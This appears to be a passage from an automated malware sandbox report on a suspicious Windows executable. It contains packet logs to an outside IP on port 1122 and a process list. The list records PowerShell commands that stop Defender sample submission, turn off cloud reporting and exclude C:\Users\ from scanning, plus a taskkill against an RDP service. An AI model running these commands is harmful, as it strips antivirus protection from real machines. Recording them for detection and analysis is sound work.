                                  Sep 25, 2024 01:11:13.395893097 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.395931959 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.441421986 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441451073 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441466093 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441478014 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441490889 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441504002 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441517115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441520929 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.441567898 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.441618919 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441659927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441674948 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441689014 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441698074 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.441714048 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.441855907 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441869020 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441879034 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441894054 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.441900969 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.441929102 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.442118883 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.442145109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.442154884 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.442164898 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.442176104 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.442181110 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.442189932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.442194939 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.442212105 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.442361116 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.442374945 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.442399025 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.470736027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.470784903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.470798016 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.470812082 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.470866919 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.470899105 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.470918894 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.470962048 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.471024990 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471043110 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471055984 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471081972 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.471126080 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471136093 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471147060 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471158028 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471168995 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.471188068 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.471297979 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471307993 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471318007 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471330881 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471340895 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471348047 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.471365929 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.471395016 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.471450090 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471462011 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.471496105 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.473474979 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.473517895 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.473536015 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.473576069 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.473669052 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.473681927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.473695040 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.473710060 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.473712921 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.473730087 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.473961115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.473977089 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.473992109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474005938 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.474006891 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474023104 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474035025 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.474035025 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474067926 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.474216938 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474288940 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.474401951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474416018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474428892 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474440098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474451065 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474462986 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474463940 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.474476099 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474488020 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474489927 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.474499941 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474507093 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.474514961 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474524021 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.474528074 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474539995 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474551916 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.474558115 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.474581003 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.475179911 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.475195885 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.475208044 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.475228071 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.475239038 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.475239992 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.475255966 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.475272894 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.475279093 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.475286007 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.475323915 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.490190983 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490225077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490236998 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490243912 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.490281105 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.490372896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490389109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490411043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490423918 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490426064 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.490462065 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.490715027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490736008 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490747929 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490758896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490772009 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490782976 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490784883 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.490794897 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490807056 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490822077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.490828037 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.490844965 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.491298914 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491311073 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491322994 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491333961 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491344929 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491347075 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.491355896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491370916 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491379976 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.491393089 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491404057 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491414070 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491419077 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.491426945 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491432905 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.491437912 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491450071 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.491461039 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.491493940 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.492038012 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492049932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492059946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492074013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492085934 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.492088079 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492099047 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492109060 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492114067 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.492121935 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492130995 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.492135048 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492146015 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492156982 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492168903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.492170095 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.492193937 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.492209911 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.532335043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532371044 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532387972 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532432079 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.532468081 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532479048 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532490015 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532501936 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532525063 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.532567024 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.532744884 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532757044 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532768011 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532779932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532800913 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.532816887 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.532901049 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532912016 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532923937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.532948971 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.532963991 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.533191919 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.533253908 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.533265114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.533304930 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.533411980 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.533423901 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.533437014 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.533447981 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.533456087 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.533480883 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.557779074 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.557790995 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.557801962 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.557832956 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.557873964 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.557874918 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.557883978 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.557894945 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.557918072 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.557955027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.557964087 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.557977915 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.557990074 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.558011055 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.558042049 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.558053017 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.558063984 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.558089972 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.558178902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.558191061 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.558201075 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.558212996 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.558239937 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:13.558298111 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.558306932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.558316946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:13.558331013 CEST11224970094.156.68.124192.168.2.7
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Sep 25, 2024 01:11:10.079562902 CEST192.168.2.71.1.1.10xbea7Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Sep 25, 2024 01:11:10.086438894 CEST1.1.1.1192.168.2.70xbea7No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\SgrmBroker.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\SgrmBroker.exe
                                  Imagebase:0x7ff7c1040000
                                  File size:329'504 bytes
                                  MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:2
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:3
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:4
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:5
                                  Start time:19:11:04
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:6
                                  Start time:19:11:05
                                  Start date:24/09/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x400000
                                  File size:11'950'592 bytes
                                  MD5 hash:07FC5B4F3A432B09B0D51F8B00EF05F3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:true

                                  Target ID:8
                                  Start time:19:11:05
                                  Start date:24/09/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\user\Desktop\file.exe
                                  Imagebase:0x400000
                                  File size:11'950'592 bytes
                                  MD5 hash:07FC5B4F3A432B09B0D51F8B00EF05F3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Reputation:low
                                  Has exited:false

                                  Target ID:9
                                  Start time:19:11:08
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat"
                                  Imagebase:0x7ff6f2900000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:19:11:08
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:19:11:08
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                                  Imagebase:0x7ff741d30000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:19:11:09
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:13
                                  Start time:19:11:09
                                  Start date:24/09/2024
                                  Path:C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe"
                                  Imagebase:0x7ff7e3ce0000
                                  File size:98'304 bytes
                                  MD5 hash:319865D78CC8DF6270E27521B8182BFF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 3%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:15
                                  Start time:19:11:12
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                                  Imagebase:0x7ff741d30000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:16
                                  Start time:19:11:14
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                                  Imagebase:0x7ff741d30000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:18
                                  Start time:19:11:21
                                  Start date:24/09/2024
                                  Path:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe"
                                  Imagebase:0x7ff70bd10000
                                  File size:10'639'360 bytes
                                  MD5 hash:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 19%, ReversingLabs
                                  Has exited:true

                                  Target ID:19
                                  Start time:19:11:24
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\taskkill.exe
                                  Wow64 process (32bit):false
                                  Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                                  Imagebase:0x7ff6df2a0000
                                  File size:101'376 bytes
                                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:20
                                  Start time:19:11:24
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
